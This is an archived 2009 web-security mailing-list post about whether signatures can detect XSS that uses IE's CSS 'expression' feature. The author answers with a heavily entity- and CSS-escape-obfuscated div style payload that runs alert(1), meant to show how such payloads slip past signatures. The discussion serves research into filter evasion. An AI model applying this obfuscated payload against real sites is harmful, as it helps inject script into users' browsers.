[WEB SECURITY] The Marquee Tag and XSS

gaz Heyes gazheyes at gmail.com
Thu Jan 15 10:37:53 EST 2009


2009/1/14 Ofer Shezaf <ofer at shezaf.com>

>  Saying that, the way to detect using signatures the attack vector you
> bring is using the element vital to the attack: the expression in styles
> feature in IE.
>

Writing a signature for expression is harder than you think. Did anyone see
our bluehat talk :D

Example:-
<div
style=xss:&#92&#48&#48&#54&#53&#92&#48&#48&#55&#56&#92&#48&#48&#55&#48&#92&#48&#48&#55&#50&#92&#48&#48&#54&#53&#92&#48&#48&#55&#51&#92&#48&#48&#55&#51&#92&#48&#48&#54&#57&#92&#48&#48&#54&#102&#92&#48&#48&#54&#101&#92&#48&#48&#50&#56&#92&#48&#48&#55&#55&#92&#48&#48&#54&#57&#92&#48&#48&#54&#101&#92&#48&#48&#54&#52&#92&#48&#48&#54&#102&#92&#48&#48&#55&#55&#92&#48&#48&#50&#101&#92&#48&#48&#55&#56&#92&#48&#48&#51&#102&#92&#48&#48&#51&#48&#92&#48&#48&#51&#97&#92&#48&#48&#50&#56&#92&#48&#48&#54&#49&#92&#48&#48&#54&#99&#92&#48&#48&#54&#53&#92&#48&#48&#55&#50&#92&#48&#48&#55&#52&#92&#48&#48&#50&#56&#92&#48&#48&#51&#49&#92&#48&#48&#50&#57&#92&#48&#48&#50&#99&#92&#48&#48&#55&#55&#92&#48&#48&#54&#57&#92&#48&#48&#54&#101&#92&#48&#48&#54&#52&#92&#48&#48&#54&#102&#92&#48&#48&#55&#55&#92&#48&#48&#50&#101&#92&#48&#48&#55&#56&#92&#48&#48&#51&#100&#92&#48&#48&#51&#49&#92&#48&#48&#50&#57&#92&#48&#48&#50&#57>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20090115/fc510f1e/attachment.html>


More information about the websecurity mailing list